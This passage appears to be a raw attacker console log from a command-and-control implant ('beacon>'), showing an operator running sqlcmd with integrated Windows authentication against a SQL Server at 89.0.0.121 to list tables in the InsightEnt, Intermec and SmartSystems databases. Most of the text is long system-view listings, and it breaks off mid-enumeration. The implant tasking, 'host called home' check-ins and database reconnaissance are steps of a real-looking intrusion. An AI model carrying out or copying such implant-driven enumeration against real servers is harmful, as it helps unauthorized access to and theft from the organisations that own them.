InsightEnt sys dm_db_session_space_usage VIEW NULL
InsightEnt sys dm_db_task_space_usage VIEW NULL
InsightEnt sys dm_exec_background_job_queue VIEW NULL
InsightEnt sys dm_exec_background_job_queue_stats VIEW NULL
InsightEnt sys dm_exec_cached_plans VIEW NULL
InsightEnt sys dm_exec_connections VIEW NULL
InsightEnt sys dm_exec_procedure_stats VIEW NULL
InsightEnt sys dm_exec_query_memory_grants VIEW NULL
InsightEnt sys dm_exec_query_optimizer_info VIEW NULL
InsightEnt sys dm_exec_query_resource_semaphores VIEW NULL
InsightEnt sys dm_exec_query_stats VIEW NULL
InsightEnt sys dm_exec_query_transformation_stats VIEW NULL
InsightEnt sys dm_exec_requests VIEW NULL
InsightEnt sys dm_exec_sessions VIEW NULL
InsightEnt sys dm_exec_trigger_stats VIEW NULL
InsightEnt sys dm_filestream_file_io_handles VIEW NULL
InsightEnt sys dm_filestream_file_io_requests VIEW NULL
InsightEnt sys dm_fts_active_catalogs VIEW NULL
InsightEnt sys dm_fts_fdhosts VIEW NULL
InsightEnt sys dm_fts_index_population VIEW NULL
InsightEnt sys dm_fts_memory_buffers VIEW NULL
InsightEnt sys dm_fts_memory_pools VIEW NULL
InsightEnt sys dm_fts_outstanding_batches VIEW NULL
InsightEnt sys dm_fts_population_ranges VIEW NULL
InsightEnt sys dm_io_backup_tapes VIEW NULL
InsightEnt sys dm_io_cluster_shared_drives VIEW NULL
InsightEnt sys dm_io_pending_io_requests VIEW NULL
InsightEnt sys dm_os_buffer_descriptors VIEW NULL
InsightEnt sys dm_os_child_instances VIEW NULL
InsightEnt sys dm_os_cluster_nodes VIEW NULL
InsightEnt sys dm_os_dispatcher_pools VIEW NULL
InsightEnt sys dm_os_dispatchers VIEW NULL
InsightEnt sys dm_os_hosts VIEW NULL
InsightEnt sys dm_os_latch_stats VIEW NULL
InsightEnt sys dm_os_loaded_modules VIEW NULL
InsightEnt sys dm_os_memory_allocations VIEW NULL
InsightEnt sys dm_os_memory_brokers VIEW NULL
InsightEnt sys dm_os_memory_cache_clock_hands VIEW NULL
InsightEnt sys dm_os_memory_cache_counters VIEW NULL
InsightEnt sys dm_os_memory_cache_entries VIEW NULL
InsightEnt sys dm_os_memory_cache_hash_tables VIEW NULL
InsightEnt sys dm_os_memory_clerks VIEW NULL
InsightEnt sys dm_os_memory_node_access_stats VIEW NULL
InsightEnt sys dm_os_memory_nodes VIEW NULL
InsightEnt sys dm_os_memory_objects VIEW NULL
InsightEnt sys dm_os_memory_pools VIEW NULL
InsightEnt sys dm_os_nodes VIEW NULL
InsightEnt sys dm_os_performance_counters VIEW NULL
InsightEnt sys dm_os_process_memory VIEW NULL
InsightEnt sys dm_os_ring_buffers VIEW NULL
InsightEnt sys dm_os_schedulers VIEW NULL
InsightEnt sys dm_os_spinlock_stats VIEW NULL
InsightEnt sys dm_os_stacks VIEW NULL
InsightEnt sys dm_os_sublatches VIEW NULL
InsightEnt sys dm_os_sys_info VIEW NULL
InsightEnt sys dm_os_sys_memory VIEW NULL
InsightEnt sys dm_os_tasks VIEW NULL
InsightEnt sys dm_os_threads VIEW NULL
InsightEnt sys dm_os_virtual_address_dump VIEW NULL
InsightEnt sys dm_os_wait_stats VIEW NULL
InsightEnt sys dm_os_waiting_tasks VIEW NULL
InsightEnt sys dm_os_windows_info VIEW NULL
InsightEnt sys dm_os_worker_local_storage VIEW NULL
InsightEnt sys dm_os_workers VIEW NULL
InsightEnt sys dm_qn_subscriptions VIEW NULL
InsightEnt sys dm_repl_articles VIEW NULL
InsightEnt sys dm_repl_schemas VIEW NULL
InsightEnt sys dm_repl_tranhash VIEW NULL
InsightEnt sys dm_repl_traninfo VIEW NULL
InsightEnt sys dm_resource_governor_configuration VIEW NULL
InsightEnt sys dm_resource_governor_resource_pools VIEW NULL
InsightEnt sys dm_resource_governor_workload_groups VIEW NULL
InsightEnt sys dm_server_audit_status VIEW NULL
InsightEnt sys dm_server_memory_dumps VIEW NULL
InsightEnt sys dm_server_registry VIEW NULL
InsightEnt sys dm_server_services VIEW NULL
InsightEnt sys dm_tran_active_snapshot_database_transactions VIEW NULL
InsightEnt sys dm_tran_active_transactions VIEW NULL
InsightEnt sys dm_tran_commit_table VIEW NULL
InsightEnt sys dm_tran_current_snapshot VIEW NULL
InsightEnt sys dm_tran_current_transaction VIEW NULL
InsightEnt sys dm_tran_database_transactions VIEW NULL
InsightEnt sys dm_tran_locks VIEW NULL
InsightEnt sys dm_tran_session_transactions VIEW NULL
InsightEnt sys dm_tran_top_version_generators VIEW NULL
InsightEnt sys dm_tran_transactions_snapshot VIEW NULL
InsightEnt sys dm_tran_version_store VIEW NULL
InsightEnt sys dm_xe_map_values VIEW NULL
InsightEnt sys dm_xe_object_columns VIEW NULL
InsightEnt sys dm_xe_objects VIEW NULL
InsightEnt sys dm_xe_packages VIEW NULL
InsightEnt sys dm_xe_session_event_actions VIEW NULL
InsightEnt sys dm_xe_session_events VIEW NULL
InsightEnt sys dm_xe_session_object_columns VIEW NULL
InsightEnt sys dm_xe_session_targets VIEW NULL
InsightEnt sys dm_xe_sessions VIEW NULL
InsightEnt sys endpoint_webmethods VIEW NULL
InsightEnt sys endpoints VIEW NULL
InsightEnt sys event_notification_event_types VIEW NULL
InsightEnt sys event_notifications VIEW NULL
InsightEnt sys events VIEW NULL
InsightEnt sys extended_procedures VIEW NULL
InsightEnt sys extended_properties VIEW NULL
InsightEnt sys filegroups VIEW NULL
InsightEnt sys foreign_key_columns VIEW NULL
InsightEnt sys foreign_keys VIEW NULL
InsightEnt sys fulltext_catalogs VIEW NULL
InsightEnt sys fulltext_document_types VIEW NULL
InsightEnt sys fulltext_index_catalog_usages VIEW NULL
InsightEnt sys fulltext_index_columns VIEW NULL
InsightEnt sys fulltext_index_fragments VIEW NULL
InsightEnt sys fulltext_index_indexes VIEW NULL
InsightEnt sys fulltext_languages VIEW NULL
InsightEnt sys fulltext_stoplists VIEW NULL
InsightEnt sys fulltext_stopwords VIEW NULL
InsightEnt sys fulltext_system_stopwords VIEW NULL
InsightEnt sys function_order_columns VIEW NULL
InsightEnt sys http_endpoints VIEW NULL
InsightEnt sys identity_columns VIEW NULL
InsightEnt sys index_columns VIEW NULL
InsightEnt sys indexes VIEW NULL
InsightEnt sys internal_tables VIEW NULL
InsightEnt sys key_constraints VIEW NULL
InsightEnt sys key_encryptions VIEW NULL
InsightEnt sys linked_logins VIEW NULL
InsightEnt sys login_token VIEW NULL
InsightEnt sys master_files VIEW NULL
InsightEnt sys master_key_passwords VIEW NULL
InsightEnt sys message_type_xml_schema_collection_usages VIEW NULL
InsightEnt sys messages VIEW NULL
InsightEnt sys module_assembly_usages VIEW NULL
InsightEnt sys numbered_procedure_parameters VIEW NULL
InsightEnt sys numbered_procedures VIEW NULL
InsightEnt sys objects VIEW NULL
InsightEnt sys openkeys VIEW NULL
InsightEnt sys parameter_type_usages VIEW NULL
InsightEnt sys parameter_xml_schema_collection_usages VIEW NULL
InsightEnt sys parameters VIEW NULL
InsightEnt sys partition_functions VIEW NULL
InsightEnt sys partition_parameters VIEW NULL
InsightEnt sys partition_range_values VIEW NULL
InsightEnt sys partition_schemes VIEW NULL
InsightEnt sys partitions VIEW NULL
InsightEnt sys plan_guides VIEW NULL
InsightEnt sys procedures VIEW NULL
InsightEnt sys remote_logins VIEW NULL
InsightEnt sys remote_service_bindings VIEW NULL
InsightEnt sys resource_governor_configuration VIEW NULL
InsightEnt sys resource_governor_resource_pools VIEW NULL
InsightEnt sys resource_governor_workload_groups VIEW NULL
InsightEnt sys routes VIEW NULL
InsightEnt sys schemas VIEW NULL
InsightEnt sys securable_classes VIEW NULL
InsightEnt sys server_assembly_modules VIEW NULL
InsightEnt sys server_audit_specification_details VIEW NULL
InsightEnt sys server_audit_specifications VIEW NULL
InsightEnt sys server_audits VIEW NULL
InsightEnt sys server_event_notifications VIEW NULL
InsightEnt sys server_event_session_actions VIEW NULL
InsightEnt sys server_event_session_events VIEW NULL
InsightEnt sys server_event_session_fields VIEW NULL
InsightEnt sys server_event_session_targets VIEW NULL
InsightEnt sys server_event_sessions VIEW NULL
InsightEnt sys server_events VIEW NULL
InsightEnt sys server_file_audits VIEW NULL
InsightEnt sys server_permissions VIEW NULL
InsightEnt sys server_principal_credentials VIEW NULL
InsightEnt sys server_principals VIEW NULL
InsightEnt sys server_role_members VIEW NULL
InsightEnt sys server_sql_modules VIEW NULL
InsightEnt sys server_trigger_events VIEW NULL
InsightEnt sys server_triggers VIEW NULL
InsightEnt sys servers VIEW NULL
InsightEnt sys service_broker_endpoints VIEW NULL
InsightEnt sys service_contract_message_usages VIEW NULL
InsightEnt sys service_contract_usages VIEW NULL
InsightEnt sys service_contracts VIEW NULL
InsightEnt sys service_message_types VIEW NULL
InsightEnt sys service_queue_usages VIEW NULL
InsightEnt sys service_queues VIEW NULL
InsightEnt sys services VIEW NULL
InsightEnt sys soap_endpoints VIEW NULL
InsightEnt sys spatial_index_tessellations VIEW NULL
InsightEnt sys spatial_indexes VIEW NULL
InsightEnt sys spatial_reference_systems VIEW NULL
InsightEnt sys sql_dependencies VIEW NULL
InsightEnt sys sql_expression_dependencies VIEW NULL
InsightEnt sys sql_logins VIEW NULL
InsightEnt sys sql_modules VIEW NULL
InsightEnt sys stats VIEW NULL
InsightEnt sys stats_columns VIEW NULL
InsightEnt sys symmetric_keys VIEW NULL
InsightEnt sys synonyms VIEW NULL
InsightEnt sys sysaltfiles VIEW NULL
InsightEnt sys syscacheobjects VIEW NULL
InsightEnt sys syscharsets VIEW NULL
InsightEnt sys syscolumns VIEW NULL
InsightEnt sys syscomments VIEW NULL
InsightEnt sysconfigures VIEW NULL
InsightEnt sysconstraints VIEW NULL
InsightEnt sys syscurconfigs VIEW NULL
InsightEnt sys syscursorcolumns VIEW NULL
InsightEnt sys syscursorrefs VIEW NULL
InsightEnt sys syscursors VIEW NULL
InsightEnt sys syscursortables VIEW NULL
InsightEnt sysdatabases VIEW NULL
InsightEnt sysdepends VIEW NULL
InsightEnt sysdevices VIEW NULL
InsightEnt sys sysfilegroups VIEW NULL
InsightEnt sys sysfiles VIEW NULL
InsightEnt sys sysforeignkeys VIEW NULL
InsightEnt sys sysfulltextcatalogs VIEW NULL
InsightEnt sys sysindexes VIEW NULL
InsightEnt sys sysindexkeys VIEW NULL
InsightEnt sys syslanguages VIEW NULL
InsightEnt sys syslockinfo VIEW NULL
InsightEnt sys syslogins VIEW NULL
InsightEnt sys sysmembers VIEW NULL
InsightEnt sys sysmessages VIEW NULL
InsightEnt sys sysobjects VIEW NULL
InsightEnt sys sysoledbusers VIEW NULL
InsightEnt sys sysopentapes VIEW NULL
InsightEnt sys sysperfinfo VIEW NULL
InsightEnt sys syspermissions VIEW NULL
InsightEnt sys sysprocesses VIEW NULL
InsightEnt sys sysprotects VIEW NULL
InsightEnt sys sysreferences VIEW NULL
InsightEnt sysremotelogins VIEW NULL
InsightEnt syss sysservers VIEW NULL
InsightEnt sys system_columns VIEW NULL
InsightEnt sys system_components_surface_area_configuration VIEW NULL
InsightEnt sys system_internals_allocation_units VIEW NULL
InsightEnt sys system_internals_partition_columns VIEW NULL
InsightEnt sys system_internals_partitions VIEW NULL
InsightEnt sys system_objects VIEW NULL
InsightEnt sys system_parameters VIEW NULL
InsightEnt sys system_sql_modules VIEW NULL
InsightEnt sys system_views VIEW NULL
InsightEnt sys systypes VIEW NULL
InsightEnt sys sysusers VIEW NULL
InsightEnt sys table_types VIEW NULL
InsightEnt sys tables VIEW NULL
InsightEnt sys tcp_endpoints VIEW NULL
InsightEnt sys trace_categories VIEW NULL
InsightEnt sys trace_columns VIEW NULL
InsightEnt sys trace_event_bindings VIEW NULL
InsightEnt sys trace_events VIEW NULL
InsightEnt sys trace_subclass_values VIEW NULL
InsightEnt sys traces VIEW NULL
InsightEnt sys transmission_queue VIEW NULL
InsightEnt sys trigger_event_types VIEW NULL
InsightEnt sys trigger_events VIEW NULL
InsightEnt sys triggers VIEW NULL
InsightEnt sys type_assembly_usages VIEW NULL
InsightEnt sys types VIEW NULL
InsightEnt sys user_token VIEW NULL
InsightEnt sys via_endpoints VIEW NULL
InsightEnt sys views VIEW NULL
InsightEnt sys xml_indexes VIEW NULL
InsightEnt sys xml_schema_attributes VIEW NULL
InsightEnt sys xml_schema_collections VIEW NULL
InsightEnt sys xml_schema_component_placements VIEW NULL
InsightEnt sys xml_schema_components VIEW NULL
InsightEnt sys xml_schema_elements VIEW NULL
InsightEnt sys xml_schema_facets VIEW NULL
InsightEnt sys xml_schema_model_groups VIEW NULL
InsightEnt sys xml_schema_namespaces VIEW NULL
InsightEnt sys xml_schema_types VIEW NULL
InsightEnt sys xml_schema_wildcard_namespaces VIEW NULL
InsightEnt sys xml_schema_wildcards VIEW NULL

(415 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use Intermec; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use Intermec; exec sp_tables" -W
[+] host called home, sent: 96 bytes
[+] received output:
Changed database context to 'Intermec'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
Intermec INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
Intermec INFORMATION_SCHEMA COLUMNS VIEW NULL
Intermec INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA DOMAINS VIEW NULL
Intermec INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA PARAMETERS VIEW NULL
Intermec INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
Intermec INFORMATION_SCHEMA ROUTINES VIEW NULL
Intermec INFORMATION_SCHEMA SCHEMATA VIEW NULL
Intermec INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
Intermec INFORMATION_SCHEMA TABLES VIEW NULL
Intermec INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA VIEWS VIEW NULL
Intermec sys all_columns VIEW NULL
Intermec sys all_objects VIEW NULL
Intermec sys all_parameters VIEW NULL
Intermec sys all_sql_modules VIEW NULL
Intermec sys all_views VIEW NULL
Intermec sys allocation_units VIEW NULL
Intermec sys assemblies VIEW NULL
Intermec sys assembly_files VIEW NULL
Intermec sys assembly_modules VIEW NULL
Intermec sys assembly_references VIEW NULL
Intermec sys assembly_types VIEW NULL
Intermec sys asymmetric_keys VIEW NULL
Intermec sys backup_devices VIEW NULL
Intermec sys certificates VIEW NULL
Intermec sys change_tracking_databases VIEW NULL
Intermec sys change_tracking_tables VIEW NULL
Intermec sys check_constraints VIEW NULL
Intermec sys column_type_usages VIEW NULL
Intermec sys column_xml_schema_collection_usages VIEW NULL
Intermec sys columns VIEW NULL
Intermec sys computed_columns VIEW NULL
Intermec sys configurations VIEW NULL
Intermec sys conversation_endpoints VIEW NULL
Intermec sys conversation_groups VIEW NULL
Intermec sys conversation_priorities VIEW NULL
Intermec sys credentials VIEW NULL
Intermec sys crypt_properties VIEW NULL
Intermec sys cryptographic_providers VIEW NULL
Intermec sys data_spaces VIEW NULL
Intermec sys database_audit_specification_details VIEW NULL
Intermec sys database_audit_specifications VIEW NULL
Intermec sys database_files VIEW NULL
Intermec sys database_mirroring VIEW NULL
Intermec sys database_mirroring_endpoints VIEW NULL
Intermec sys database_mirroring_witnesses VIEW NULL
Intermec sys database_permissions VIEW NULL
Intermec sys database_principal_aliases VIEW NULL
Intermec sys database_principal_aliases VIEW NULL
Intermec sys database_recovery_status VIEW NULL
Intermec sys database_role_members VIEW NULL
Intermec sys databases VIEW NULL
Intermec sys default_constraints VIEW NULL
Intermec sys destination_data_spaces VIEW NULL
Intermec sys dm_audit_actions VIEW NULL
Intermec sys dm_audit_class_type_map VIEW NULL
Intermec sys dm_broker_activated_tasks VIEW NULL
Intermec sys dm_broker_connections VIEW NULL
Intermec sys dm_broker_forwarded_messages VIEW NULL
Intermec sys dm_broker_queue_monitors VIEW NULL
Intermec sys dm_cdc_errors VIEW NULL
Intermec sys dm_cdc_log_scan_sessions VIEW NULL
Intermec sys dm_clr_appdomains VIEW NULL
Intermec sys dm_clr_loaded_assemblies VIEW NULL
Intermec sys dm_clr_properties VIEW NULL
Intermec sys dm_clr_tasks VIEW NULL
Intermec sys dm_cryptographic_provider_properties VIEW NULL
Intermec sys dm_database_encryption_keys VIEW NULL
Intermec sys dm_db_file_space_usage VIEW NULL
Intermec sys dm_db_index_usage_stats VIEW NULL
Intermec sys dm_db_mirroring_auto_page_repair VIEW NULL
Intermec sys dm_db_mirroring_connections VIEW NULL
Intermec sys dm_db_mirroring_past_actions VIEW NULL
Intermec sys dm_db_missing_index_details VIEW NULL
Intermec sys dm_db_missing_index_group_stats VIEW NULL
Intermec sys dm_db_missing_index_groups VIEW NULL
Intermec sys dm_db_partition_stats VIEW NULL
Intermec sys dm_db_persisted_sku_features VIEW NULL
Intermec sys dm_db_script_level VIEW NULL
Intermec sys dm_db_session_space_usage VIEW NULL
Intermec sys dm_db_task_space_usage VIEW NULL
Intermec sys dm_exec_background_job_queue VIEW NULL
Intermec sys dm_exec_background_job_queue_stats VIEW NULL
Intermec sys dm_exec_cached_plans VIEW NULL
Intermec sys dm_exec_connections VIEW NULL
Intermec sys dm_exec_procedure_stats VIEW NULL
Intermec sys dm_exec_query_memory_grants VIEW NULL
Intermec sys dm_exec_query_optimizer_info VIEW NULL
Intermec sys dm_exec_query_resource_semaphores VIEW NULL
Intermec sys dm_exec_query_stats VIEW NULL
Intermec sys dm_exec_query_transformation_stats VIEW NULL
Intermec sys dm_exec_requests VIEW NULL
Intermec sys dm_exec_sessions VIEW NULL
Intermec sys dm_exec_trigger_stats VIEW NULL
Intermec sys dm_filestream_file_io_handles VIEW NULL
Intermec sys dm_filestream_file_io_requests VIEW NULL
Intermec sys dm_fts_active_catalogs VIEW NULL
Intermec sys dm_fts_fdhosts VIEW NULL
Intermec sys dm_fts_index_population VIEW NULL
Intermec sys dm_fts_memory_buffers VIEW NULL
Intermec sys dm_fts_memory_pools VIEW NULL
Intermec sys dm_fts_outstanding_batches VIEW NULL
Intermec sys dm_fts_population_ranges VIEW NULL
Intermec sys dm_io_backup_tapes VIEW NULL
Intermec sys dm_io_cluster_shared_drives VIEW NULL
Intermec sys dm_io_pending_io_requests VIEW NULL
Intermec sys dm_os_buffer_descriptors VIEW NULL
Intermec sys dm_os_child_instances VIEW NULL
Intermec sys dm_os_cluster_nodes VIEW NULL
Intermec sys dm_os_dispatcher_pools VIEW NULL
Intermec sys dm_os_dispatchers VIEW NULL
Intermec sys dm_os_hosts VIEW NULL
Intermec sys dm_os_latch_stats VIEW NULL
Intermec sys dm_os_loaded_modules VIEW NULL
Intermec sys dm_os_memory_allocations VIEW NULL
Intermec sys dm_os_memory_brokers VIEW NULL
Intermec sys dm_os_memory_cache_clock_hands VIEW NULL
Intermec sys dm_os_memory_cache_counters VIEW NULL
Intermec sys dm_os_memory_cache_entries VIEW NULL
Intermec sys dm_os_memory_cache_hash_tables VIEW NULL
Intermec sys dm_os_memory_clerks VIEW NULL
Intermec sys dm_os_memory_node_access_stats VIEW NULL
Intermec sys dm_os_memory_nodes VIEW NULL
Intermec sys dm_os_memory_objects VIEW NULL
Intermec sys dm_os_memory_pools VIEW NULL
Intermec sys dm_os_nodes VIEW NULL
Intermec sys dm_os_performance_counters VIEW NULL
Intermec sys dm_os_process_memory VIEW NULL
Intermec sys dm_os_ring_buffers VIEW NULL
Intermec sys dm_os_schedulers VIEW NULL
Intermec sys dm_os_spinlock_stats VIEW NULL
Intermec sys dm_os_stacks VIEW NULL
Intermec sys dm_os_sublatches VIEW NULL
Intermec sys dm_os_sys_info VIEW NULL
Intermec sys dm_os_sys_memory VIEW NULL
Intermec sys dm_os_tasks VIEW NULL
Intermec sys dm_os_threads VIEW NULL
Intermec sys dm_os_virtual_address_dump VIEW NULL
Intermec sys dm_os_wait_stats VIEW NULL
Intermec sys dm_os_waiting_tasks VIEW NULL
Intermec sys dm_os_windows_info VIEW NULL
Intermec sys dm_os_worker_local_storage VIEW NULL
Intermec sys dm_os_workers VIEW NULL
Intermec sys dm_qn_subscriptions VIEW NULL
Intermec sys dm_repl_articles VIEW NULL
Intermec sys dm_repl_schemas VIEW NULL
Intermec sys dm_repl_tranhash VIEW NULL
Intermec sys dm_repl_traninfo VIEW NULL
Intermec sys dm_resource_governor_configuration VIEW NULL
Intermec sys dm_resource_governor_resource_pools VIEW NULL
Intermec sys dm_resource_governor_workload_groups VIEW NULL
Intermec sys dm_server_audit_status VIEW NULL
Intermec sys dm_server_memory_dumps VIEW NULL
Intermec sys dm_server_registry VIEW NULL
Intermec sys dm_server_services VIEW NULL
Intermec sys dm_tran_active_snapshot_database_transactions VIEW NULL
Intermec sys dm_tran_active_transactions VIEW NULL
Intermec sys dm_tran_commit_table VIEW NULL
Intermec sys dm_tran_current_snapshot VIEW NULL
Intermec sys dm_tran_current_transaction VIEW NULL
Intermec sys dm_tran_database_transactions VIEW NULL
Intermec sys dm_tran_locks VIEW NULL
Intermec sys dm_tran_session_transactions VIEW NULL
Intermec sys dm_tran_top_version_generators VIEW NULL
Intermec sys dm_tran_transactions_snapshot VIEW NULL
Intermec sys dm_tran_version_store VIEW NULL
Intermec sys dm_xe_map_values VIEW NULL
Intermec sys dm_xe_object_columns VIEW NULL
Intermec sys dm_xe_objects VIEW NULL
Intermec sys dm_xe_packages VIEW NULL
Intermec sys dm_xe_session_event_actions VIEW NULL
Intermec sys dm_xe_session_events VIEW NULL
Intermec sys dm_xe_session_object_columns VIEW NULL
Intermec sys dm_xe_session_targets VIEW NULL
Intermec sys dm_xe_sessions VIEW NULL
Intermec sys endpoint_webmethods VIEW NULL
Intermec sys endpoints VIEW NULL
Intermec sys event_notification_event_types VIEW NULL
Intermec sys event_notifications VIEW NULL
Intermec sys events VIEW NULL
Intermec sys extended_procedures VIEW NULL
Intermec sys extended_properties VIEW NULL
Intermec sys filegroups VIEW NULL
Intermec sys foreign_key_columns VIEW NULL
Intermec sys foreign_keys VIEW NULL
Intermec sys fulltext_catalogs VIEW NULL
Intermec sys fulltext_document_types VIEW NULL
Intermec sys fulltext_index_catalog_usages VIEW NULL
Intermec sys fulltext_index_columns VIEW NULL
Intermec sys fulltext_index_fragments VIEW NULL
Intermec sys fulltext_index_indexes VIEW NULL
Intermec sys fulltext_languages VIEW NULL
Intermec sys fulltext_stoplists VIEW NULL
Intermec sys fulltext_stopwords VIEW NULL
Intermec sys fulltext_system_stopwords VIEW NULL
Intermec sys function_order_columns VIEW NULL
Intermec sys http_endpoints VIEW NULL
Intermec sys identity_columns VIEW NULL
Intermec sys index_columns VIEW NULL
Intermec sys indexes VIEW NULL
Intermec sys internal_tables VIEW NULL
Intermec sys key_constraints VIEW NULL
Intermec sys key_encryptions VIEW NULL
Intermec sys linked_logins VIEW NULL
Intermec sys login_token VIEW NULL
Intermec sys master_files VIEW NULL
Intermec sys master_key_passwords VIEW NULL
Intermec sys message_type_xml_schema_collection_usages VIEW NULL
Intermec sys messages VIEW NULL
Intermec sys module_assembly_usages VIEW NULL
Intermec sys numbered_procedure_parameters VIEW NULL
Intermec sys numbered_procedures VIEW NULL
Intermec sys objects VIEW NULL
Intermec sys openkeys VIEW NULL
Intermec sys parameter_type_usages VIEW NULL
Intermec sys parameter_xml_schema_collection_usages VIEW NULL
Intermec sys parameters VIEW NULL
Intermec sys partition_functions VIEW NULL
Intermec sys partition_parameters VIEW NULL
Intermec sys partition_range_values VIEW NULL
Intermec sys partition_schemes VIEW NULL
Intermec sys partitions VIEW NULL
Intermec sys plan_guides VIEW NULL
Intermec sys procedures VIEW NULL
Intermec sys remote_logins VIEW NULL
Intermec sys remote_service_bindings VIEW NULL
Intermec sys resource_governor_configuration VIEW NULL
Intermec sys resource_governor_resource_pools VIEW NULL
Intermec sys resource_governor_workload_groups VIEW NULL
Intermec sys routes VIEW NULL
Intermec sys schemas VIEW NULL
Intermec sys securable_classes VIEW NULL
Intermec sys server_assembly_modules VIEW NULL
Intermec sys server_audit_specification_details VIEW NULL
Intermec sys server_audit_specifications VIEW NULL
Intermec sys server_audits VIEW NULL
Intermec sys server_event_notifications VIEW NULL
Intermec sys server_event_session_actions VIEW NULL
Intermec sys server_event_session_events VIEW NULL
Intermec sys server_event_session_fields VIEW NULL
Intermec sys server_event_session_targets VIEW NULL
Intermec sys server_event_sessions VIEW NULL
Intermec sys server_events VIEW NULL
Intermec sys server_file_audits VIEW NULL
Intermec sys server_permissions VIEW NULL
Intermec sys server_principal_credentials VIEW NULL
Intermec sys server_principals VIEW NULL
Intermec sys server_role_members VIEW NULL
Intermec sys server_sql_modules VIEW NULL
Intermec sys server_trigger_events VIEW NULL
Intermec sys server_triggers VIEW NULL
Intermec sys servers VIEW NULL
Intermec sys service_broker_endpoints VIEW NULL
Intermec sys service_contract_message_usages VIEW NULL
Intermec sys service_contract_usages VIEW NULL
Intermec sys service_contracts VIEW NULL
Intermec sys service_message_types VIEW NULL
Intermec sys service_queue_usages VIEW NULL
Intermec sys service_queues VIEW NULL
Intermec sys services VIEW NULL
Intermec sys soap_endpoints VIEW NULL
Intermec sys spatial_index_tessellations VIEW NULL
Intermec sys spatial_indexes VIEW NULL
Intermec sys spatial_reference_systems VIEW NULL
Intermec sys sql_dependencies VIEW NULL
Intermec sys sql_expression_dependencies VIEW NULL
Intermec sys sql_logins VIEW NULL
Intermec sys sql_modules VIEW NULL
Intermec sys stats VIEW NULL
Intermec sys stats_columns VIEW NULL
Intermec sys symmetric_keys VIEW NULL
Intermec sys synonyms VIEW NULL
Intermec sys sysaltfiles VIEW NULL
Intermec sys syscacheobjects VIEW NULL
Intermec sys syscharsets VIEW NULL
Intermec sys syscolumns VIEW NULL
Intermec sys syscomments VIEW NULL
Intermec sys sysconfigures VIEW NULL
Intermec sys sysconstraints VIEW NULL
Intermec sys syscurconfigs VIEW NULL
Intermec sys syscursorcolumns VIEW NULL
Intermec sys syscursorrefs VIEW NULL
Intermec sys syscursors VIEW NULL
Intermec sys syscursortables VIEW NULL
Intermec sys sysdatabases VIEW NULL
Intermec sys sysdepends VIEW NULL
Intermec sys sysdevices VIEW NULL
Intermec sys sysfilegroups VIEW NULL
Intermec sys sysfiles VIEW NULL
Intermec sys sysforeignkeys VIEW NULL
Intermec sys sysfulltextcatalogs VIEW NULL
Intermec sys sysindexes VIEW NULL
Intermec sys sysindexkeys VIEW NULL
Intermec sys syslanguages VIEW NULL
Intermec sys syslockinfo VIEW NULL
Intermec sys syslogins VIEW NULL
Intermec sys sysmembers VIEW NULL
Intermec sys sysmessages VIEW NULL
Intermec sys sysobjects VIEW NULL
Intermec sys sysoledbusers VIEW NULL
Intermec sys sysopentapes VIEW NULL
Intermec sys sysperfinfo VIEW NULL
Intermec sys syspermissions VIEW NULL
Intermec sys sysprocesses VIEW NULL
Intermec sys sysprotects VIEW NULL
Intermec sys sysreferences VIEW NULL
Intermec sys sysremotelogins VIEW NULL
Intermec syss sysservers VIEW NULL
Intermec sys system_columns VIEW NULL
Intermec sys system_components_surface_area_configuration VIEW NULL
Intermec sys system_internals_allocation_units VIEW NULL
Intermec sys system_internals_partition_columns VIEW NULL
Intermec sys system_internals_partitions VIEW NULL
Intermec sys system_objects VIEW NULL
Intermec sys system_parameters VIEW NULL
Intermec sys system_sql_modules VIEW NULL
Intermec sys system_views VIEW NULL
Intermec sys systypes VIEW NULL
Intermec sys sysusers VIEW NULL
Intermec sys table_types VIEW NULL
Intermec sys tables VIEW NULL
Intermec sys tcp_endpoints VIEW NULL
Intermec sys trace_categories VIEW NULL
Intermec sys trace_columns VIEW NULL
Intermec sys trace_event_bindings VIEW NULL
Intermec sys trace_events VIEW NULL
Intermec sys trace_subclass_values VIEW NULL
Intermec sys traces VIEW NULL
Intermec sys transmission_queue VIEW NULL
Intermec sys trigger_event_types VIEW NULL
Intermec sys trigger_events VIEW NULL
Intermec sys triggers VIEW NULL
Intermec sys type_assembly_usages VIEW NULL
Intermec sys types VIEW NULL
Intermec sys user_token VIEW NULL
Intermec sys via_endpoints VIEW NULL
Intermec sys views VIEW NULL
Intermec sys xml_indexes VIEW NULL
Intermec sys xml_schema_attributes VIEW NULL
Intermec sys xml_schema_collections VIEW NULL
Intermec sys xml_schema_component_placements VIEW NULL
Intermec sys xml_schema_components VIEW NULL
Intermec sys xml_schema_elements VIEW NULL
Intermec sys xml_schema_facets VIEW NULL
Intermec sys xml_schema_model_groups VIEW NULL
Intermec sys xml_schema_namespaces VIEW NULL
Intermec sys xml_schema_types VIEW NULL
Intermec sys xml_schema_wildcard_namespaces VIEW NULL
Intermec sys xml_schema_wildcards VIEW NULL

(358 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use SmartSystems; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use SmartSystems; exec sp_tables" -W
[+] host called home, sent: 100 bytes
[+] received output:
Changed database context to 'SmartSystems'.
